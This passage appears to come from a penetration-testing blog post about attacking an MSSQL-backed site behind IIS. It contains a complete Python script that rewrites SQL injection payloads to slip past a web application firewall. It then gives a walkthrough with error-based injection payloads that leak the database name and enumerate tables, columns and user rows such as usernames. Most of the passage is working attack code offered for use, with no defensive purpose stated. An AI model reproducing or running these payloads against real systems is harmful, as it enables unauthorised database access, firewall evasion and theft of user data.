5. Finally, extend the script to accept a payload from standard input. The final code is as follows:
```python
import random


def bypass(payload):
    # URL-encoded control characters (and space) used as filler around
    # operators and keywords; one is picked at random per payload.
    chars1 = ['%01', '%02', '%03', '%04', '%05', '%06', '%07', '%08', '%09',
              '%0A', '%0B', '%0C', '%0D', '%0E', '%0F', '%10', '%11', '%12',
              '%13', '%14', '%15', '%16', '%17', '%18', '%19', '%1A', '%1B',
              '%1C', '%1D', '%1E', '%1F', '%20']
    # Inline comments and '+' that replace every space in the payload.
    chars2 = ["/**/", "/*!*/", "/*!safe6*/", "+"]
    v = random.choice(chars1)
    payload = payload.replace(" ", random.choice(chars2))
    # Pad operators and keywords with the chosen filler character.
    payload = payload.replace("=", v + "=" + v)
    payload = payload.replace("AND", v + "AND" + v)
    payload = payload.replace("and", v + "AND" + v)
    payload = payload.replace("WHERE", v + "WHERE" + v)
    payload = payload.replace("where", v + "where" + v)
    # Rewrite one letter of each keyword as a %uXXXX sequence, which IIS
    # decodes back to the ASCII letter before it reaches the query.
    payload = payload.replace("UNION", "u%u006eion")
    payload = payload.replace("union", "u%u006eion")
    payload = payload.replace("CHAR", "%u0063har")
    payload = payload.replace("char", "%u0063har")
    payload = payload.replace("SELECT", "se%u006cect")
    payload = payload.replace("select", "se%u006cect")
    payload = payload.replace("FROM", "%u0066rom")
    payload = payload.replace("from", "%u0066rom")
    # Extra '+' (decoded as space) around parentheses and dots.
    payload = payload.replace("(", "+(")
    payload = payload.replace(".", ".+")
    payload = payload.replace("--", "/*!*/--")
    print(payload)
    return payload


if __name__ == '__main__':
    while True:
        payload = input("Enter payload: ")
        if payload == 'q':
            exit(0)
        if payload:
            bypass(payload)
```

The script has been packaged and uploaded to GitHub.
Repository: https://github.com/safe6Sec/bypassWAF
With that in place, manual injection can proceed comfortably.
MSSQL manual injection: from the earlier probing, this injection point supports both union-based and error-based injection. I will use error-based injection here.
Union-based injection requires knowing how many columns the current query returns (determined with `order by`, just as in MySQL) and also needs a column whose value is echoed back in the response.
Error-based injection relies mainly on `top 1` combined with `not in`: the subquery is placed in a numeric comparison so that SQL Server raises a type-conversion error that leaks the selected string value, and `not in` excludes the values already retrieved so the next row is returned on each request.
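The following is an added illustration of the `top 1` / `not in` error-based pattern described above; it is not part of the original post or the bypassWAF project. It assumes an injection into a single-quoted string parameter on SQL Server, and the table name `users` and column `username` are placeholders for whatever the enumeration actually returns. Each fragment is what would be fed into the bypass script before sending.

```sql
-- Step 0 (union path only): find the column count of the original query.
-- The first value of N that errors is one more than the column count.
' order by 3--

-- Step 1: leak the current database name. The subquery returns a string,
-- and comparing it to the integer 1 forces a conversion error whose
-- message contains the value.
' and 1=(select db_name())--

-- Step 2: enumerate user tables one at a time. Each request adds the
-- names already seen to the not in list so top 1 yields the next one.
' and 1=(select top 1 name from sysobjects where xtype='U')--
' and 1=(select top 1 name from sysobjects where xtype='U' and name not in ('users'))--

-- Step 3: enumerate the columns of a discovered table the same way.
' and 1=(select top 1 name from syscolumns where id=object_id('users'))--
' and 1=(select top 1 name from syscolumns where id=object_id('users') and name not in ('id'))--

-- Step 4: walk the rows of the table, excluding values already dumped.
' and 1=(select top 1 username from users)--
' and 1=(select top 1 username from users where username not in ('admin'))--
```

The numeric comparison is what makes the error informative: if the target column is already an integer the conversion succeeds and nothing leaks, so wrap it in `cast(... as varchar)` with a non-numeric prefix in that case. Keep the `not in` list growing on every request; once `top 1` finds no remaining row the subquery returns NULL, the comparison silently evaluates to false, and the enumeration is complete.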